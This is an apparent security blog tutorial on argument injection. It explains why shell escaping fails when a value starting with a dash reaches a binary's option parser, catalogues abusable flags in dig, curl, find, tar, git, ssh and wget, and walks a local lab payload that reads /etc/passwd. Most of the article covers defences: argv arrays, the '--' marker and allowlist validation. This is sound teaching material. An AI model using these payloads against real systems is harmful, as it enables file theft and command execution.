Argument injection is the variant of command injection that survives the fix most people reach for. The application correctly wraps the user value with escapeshellarg, the shell sees one well-quoted argument, and no semicolons or backticks get a chance to break out. The bug is one layer further in: the called binary parses its own arguments, sees a leading dash, and treats the attacker's value as a flag. The shell never noticed anything was wrong, because nothing was wrong at the shell layer.
This is the variant deep dive that sits under the remote code execution practitioner guide and alongside OS command injection. I cover what argument injection actually is, why escapeshellarg and escapeshellcmd do not stop it, the catalogue of common Unix tools where this is the realistic attack, a walkthrough against the rce-basic lab's /lookup.php, the three-layer fix, and the CVE pattern across git, phpmailer, imagemagick, and friends.
TL;DR
Argument injection happens when a user value, correctly shell-quoted, still reaches a binary that parses leading dashes as flags. Classic command injection inserts a whole new command through shell metacharacters (;, |, $()). Argument injection does not break out of the command at all: it abuses the same command's own option parser. escapeshellarg('-f /etc/passwd') produces '-f /etc/passwd', which is one valid shell-quoted argument, but dig looks at the leading - and reads the rest as the -f batch-file flag, opening any file www-data can read. escapeshellcmd is worse: it does not even touch dashes because dashes are not shell metacharacters. The catalogue of vulnerable tools is wide: dig -f, curl -K/-o, find -exec, tar -T, git --upload-pack, ssh -oProxyCommand, wget --use-askpass. The fix is three layers deep: stop calling shells (use argv arrays), pass -- before the user argument so the binary stops parsing flags, and validate every value against a strict allowlist before any of that.
Command injection vs argument injection
These two get conflated in writeups because they share an outcome (the attacker runs something they should not). The mechanism is different and the fix is different, so it is worth pinning the distinction.
OS command injection inserts a new command into the shell's parse tree. The application builds a single string and hands it to /bin/sh -c. The shell tokenises that string, sees a metacharacter (;, |, &&, backticks, $(), newline), and runs the attacker's command alongside the intended one. The break-out happens at the shell layer, before the target binary is invoked. The full deep dive on this is in OS command injection.
Argument injection does not insert a new command at all. The original command is the only one that runs. The attacker's value is one argument to that command, correctly delimited, correctly shell-quoted. What the attacker controls is what that argument means to the binary's own option parser. A leading dash flips the value from "the hostname to look up" to "the flag that tells dig to read queries from a file".
The two are siblings under CWE-88 (argument injection) and CWE-78 (OS command injection). They look almost identical at the call site. They feel completely different once you start exploiting them.
Why escapeshellarg does not stop this
escapeshellarg is built to do exactly one job: take a string, wrap it so the shell parses it as a single argument no matter what is inside it. It single-quotes the value and escapes any embedded single quotes. That is correct, and that is all it does.
escapeshellarg('-f /etc/passwd');
// produces: '-f /etc/passwd'The result is one well-formed shell-quoted argument. /bin/sh -c "dig '-f /etc/passwd'" tokenises into two argv elements that get passed to execve: dig and -f /etc/passwd. The shell did its job perfectly. escapeshellarg did its job perfectly. The bug is that dig is now sitting with argv[1] = "-f /etc/passwd" and its own option parser is about to look at it.
escapeshellcmd is even less help, and I have seen developers reach for it thinking it is the stronger version. From the PHP manual: "any character that might be used to trick a shell command into executing arbitrary commands is escaped." That list is shell metacharacters: &, ;, `, backslash, pipe, quotes, and a few others. A leading dash is not a shell metacharacter, because the shell does not parse dashes specially. escapeshellcmd('-f /etc/passwd') returns -f /etc/passwd unchanged. The string then gets concatenated into the command and handed to the shell, the shell tokenises on whitespace, and dig ends up with -f and /etc/passwd as two separate flags pointing at the same file.
Neither function is broken. They are both doing what they are documented to do. The mistake is expecting either of them to know what the binary on the other end will do with its arguments.
The catalogue of tools where this is the realistic attack
Argument injection is only useful when the target binary has a flag that does something interesting. Almost every classic Unix tool has at least one. The ones I have actually exploited in practice or seen in published advisories:
dig -f <file>reads DNS queries from a file. Pointed at/etc/passwdor any readable file, it tries to parse each line as a hostname, fails, and prints the offending line as part of the error message. Net effect: file read. This is the lab's example below.curl -K <configfile>reads a curl config file. The config can specifyurl = ...(request anywhere, hello SSRF),output = ...(write the response anywherewww-datacan write, including over PHP files in the web root),header = ...,user-agent = .... One flag, an entire scripting language.curl -o <path>writes the response body to an attacker-named file. Combined with a controlled URL, that is arbitrary file write.find <path> -exec <cmd> {} \;runs an arbitrary command for each match. If the application calls find with a user-supplied "search path" that the attacker starts with-exec id ;, find treats that as the action expression and runsid. Full RCE.tar -T <file>reads filenames to archive from a file. Combined with--checkpoint-action=exec=...in GNU tar, that is full command execution. The standalone--checkpoint-actionis itself a famous primitive.git fetch --upload-pack=<cmd>andgit clone --upload-pack=<cmd>. Older Git let an attacker-controlled upload-pack value run a command on the client. The submodule URL variant (CVE-2018-17456) abused the same class through a.gitmodulesURL starting with-. The class is generic even though the specific bugs are patched.ssh -o ProxyCommand=<cmd>is the canonical OpenSSH argument-injection primitive. Any application that builds an ssh command line with a user-controlled hostname is one-oProxyCommand=away from RCE.wget --use-askpass=<cmd>runs the named program to prompt for a password and uses its output. Attacker-controlled, full execution.wget --execute='set ...'lets the attacker drop arbitrary wgetrc directives, includingoutput_documentfor file write.rsync -e <cmd>sets the remote-shell command; attacker-controlled, full execution.zip --unzip-command=<cmd>and a handful of other archive tools have analogous escape hatches.mysql --defaults-file=<path>loads options from a file the attacker can name, and the loaded options includeinit-commandfor execution.
The common shape is "a flag that points at an external resource or a sub-program". Any binary with one of those is an argument-injection sink when a shell-quoted string starting with a dash reaches it.
Walking the lab
The rce-basic lab in the techearl-labs repo ships the exact sink: shell_exec('dig ' . escapeshellarg($domain)) at /lookup.php. Boot it:
docker compose up rce-basicIt listens on http://localhost:8085. The exploit is one request with a URL-encoded space:
GET /lookup.php?domain=-f%20/etc/passwd
escapeshellarg wraps the value, so what the shell tokenises is one argument: -f /etc/passwd. The shell hands dig that single argv element. dig looks at the leading -, parses -f as the batch-file flag, opens /etc/passwd, and tries to read each line as a DNS query. Every line fails to parse as a hostname, so dig emits a parse error for each one, and the error output contains the offending line: root:x:0:0:root:/root:/bin/bash, daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin, and so on. The response body contains the contents of /etc/passwd.
Any file readable by uid 33 (www-data) is exfiltrable through the same path. /etc/hosts, /proc/self/environ, /var/log/apache2/access.log, application source files, .env files that someone forgot to put outside the docroot. The bug is the file read, the impact is whatever happens to be on disk.
The ;id payloads that work against /ping.php do not work here. escapeshellarg('localhost;id') produces 'localhost;id', which dig receives as one argument and treats as a malformed hostname. The metacharacter defence works. The flag defence is what failed.
The fix in three layers
There is no single line of code that closes the class. The reliable pattern composes three defences, each one a real layer rather than a paranoid duplicate of the one before it.
1. Use argv arrays, never shells
The deep version of this is in the OS command injection article. The summary is that every modern language exposes a "run a binary directly via execve" API that takes the command and its arguments as separate values. No shell is invoked, no string concatenation happens at any layer, and the binary receives exactly the arguments you passed.
$process = proc_open(
['dig', '+short', $domain],
[1 => ['pipe', 'w'], 2 => ['pipe', 'w']],
$pipes
);result = subprocess.run(
['dig', '+short', host],
capture_output=True, text=True, timeout=5,
)const { execFile } = require('child_process');
execFile('dig', ['+short', host], (err, stdout) => { /* ... */ });out, err := exec.Command("dig", "+short", host).Output()Argv arrays alone do not close argument injection. The shell is out of the picture, but the binary still parses -f as a flag whether the argument arrived through a shell or through execve. The argv form is a prerequisite, not the whole fix.
2. Pass -- before user arguments
Most well-behaved Unix tools accept -- as an end-of-options marker. Anything after -- is treated as a positional argument even if it starts with a dash. The pattern is:
$process = proc_open(
['dig', '+short', '--', $domain],
[1 => ['pipe', 'w'], 2 => ['pipe', 'w']],
$pipes
);result = subprocess.run(['dig', '+short', '--', host], ...)With -- in place, dig reads -f /etc/passwd as a literal positional argument, fails to parse it as a hostname, and returns an error. No file read.
Two caveats. First, not every tool honours --. Some legacy tools, some tools with non-getopt parsers, and (notably) older versions of certain GNU tools either ignore the marker or treat it inconsistently. Check the manual for the specific tool before relying on this. Second, even tools that honour -- may still have flags that take a parameter starting with =, like --upload-pack=foo, which sit before any positional and are not gated by --. The marker protects positionals, not flag values.
3. Validate against a strict allowlist before shelling out
The first two layers prevent the shell and the binary from misinterpreting the value. The third layer prevents the value from getting that far if it has no business being there. Every user-supplied field has a legal character set; refuse anything outside it.
if (!preg_match('/^[a-zA-Z0-9.-]+$/', $domain)) {
http_response_code(400);
exit('invalid hostname');
}import re
if not re.fullmatch(r"[a-zA-Z0-9.-]+", host):
raise ValueError("invalid hostname")A hostname allowlist is roughly [a-zA-Z0-9.-]+. A leading dash is not in the set, so -f /etc/passwd is rejected at the validator before any subprocess call happens. A filename allowlist would be different (no .., no leading /, no ~). A UUID allowlist would be tighter still. The point is that the validator knows the field's vocabulary and refuses everything else.
Allowlists beat blocklists every time. A blocklist of "dashes, semicolons, backticks" misses tabs, newlines, and the next character the attacker tries. An allowlist of "the characters this field is allowed to contain" does not need to anticipate the attacker, because it only says yes to known-good values.
Layered together
import re, subprocess
def lookup(host: str) -> str:
if not re.fullmatch(r"[a-zA-Z0-9.-]+", host):
raise ValueError("invalid hostname")
result = subprocess.run(
["dig", "+short", "--", host],
capture_output=True, text=True, timeout=5,
)
return result.stdoutThree lines of defence: validator refuses anything that is not a hostname, argv array means no shell, -- means dig will not parse a positional as a flag even if the validator is somehow bypassed. Each layer is independent. None of them is the "real" fix; together they close the class.
The strongest version of the fix is the one I keep landing on in code review: do not shell out at all. PHP has dns_get_record. Python has dns.resolver. Node has dns.resolve. Go has net.LookupHost. The library version has no shell, no argv parser, no flag handling, and no argument-injection surface. If the work can be done with a library call, the library call is the right answer.
Real-world incidents
A short tour of argument-injection-shaped CVEs. The version-specific details live in the linked NVD entries; the lessons below are what I want to remember.
- PHPMailer, CVE-2016-10033 (December 2016). PHPMailer before 5.2.18 passed the sender address as the
-fargument tosendmailwithout sanitising it. An attacker who controlled theFromaddress on a contact form could inject additional sendmail flags, notably-X(write a debug log to an attacker-named path), turning the form into an arbitrary file write into the web root. With a.phpextension on the write path, that escalates to RCE. The class was the same as the lab'sdig -fissue: a value that reached an external binary's option parser through a path that had not anticipated dashes. - Git submodule URL, CVE-2018-17456 (October 2018). Git before 2.14.5, 2.15.3, 2.16.5, 2.17.2, 2.18.1, and 2.19.1 allowed a
.gitmodulesfile to specify a submodule URL that started with a dash. Whengit clone --recurse-submodulesran, the URL was passed togit fetch(and ultimately to a child process), where the leading dash was parsed as a flag. The attacker-controlled.gitmodulescould include--upload-pack=or-c protocol.ext.allow=always ext::...to achieve command execution on the client cloning the repository. Patched by refusing submodule URLs that start with a dash. The lesson: even non-shell call sites (git invoking git) need flag-parsing discipline. - ImageMagick "ImageTragick", CVE-2016-3714 (May 2016). Not pure argument injection (the underlying issue was the delegate mechanism running shell-out helpers with user-controlled strings), but the practical exploit shape was "field that reaches a binary that interprets it as flags or commands". Any web app that ran ImageMagick on uploaded images inherited the risk. The mitigation pattern (the
policy.xml"remove dangerous coders" config) is essentially "lock down which external binaries the library is willing to invoke at all", which is the library-level version of the allowlist defence.
GitLab and a handful of other large applications have shipped argument-injection CVEs in recent years as well; before quoting a specific CVE number or CVSS score, pull the current NVD entry rather than rely on memory.
Frequently asked questions
Where to go next
This article is the deep dive on the variant that survives shell escaping. The siblings and the wider map:
- Up to the remote code execution practitioner guide for the full RCE taxonomy.
- Across to OS command injection for the classic shell-metacharacter sink, the argv-array pattern, and the four-payload walkthrough against
/ping.php. - Across to server-side template injection for the same data-becomes-code mistake one layer up in template engines.
- Across to eval injection for the dumbest version of the bug: user input handed straight to the language runtime.
- Back to the web application security vulnerabilities taxonomy for the hub.
The recurring lesson is the one I keep writing about across this whole family. Every place untrusted input crosses into something that parses bytes as code is a sink. For argument injection that something is not the shell, it is the binary's own option parser, and the only reliable defence is to make the crossing not happen: validate the value before it travels, pass it as a positional with -- in front, and prefer a library call over a subprocess whenever one exists.
Sources
Authoritative references this article was fact-checked against.
- CWE-88, Argument Injection or Modificationcwe.mitre.org
- OWASP, Command injectionowasp.org
- PHP, escapeshellcmdphp.net





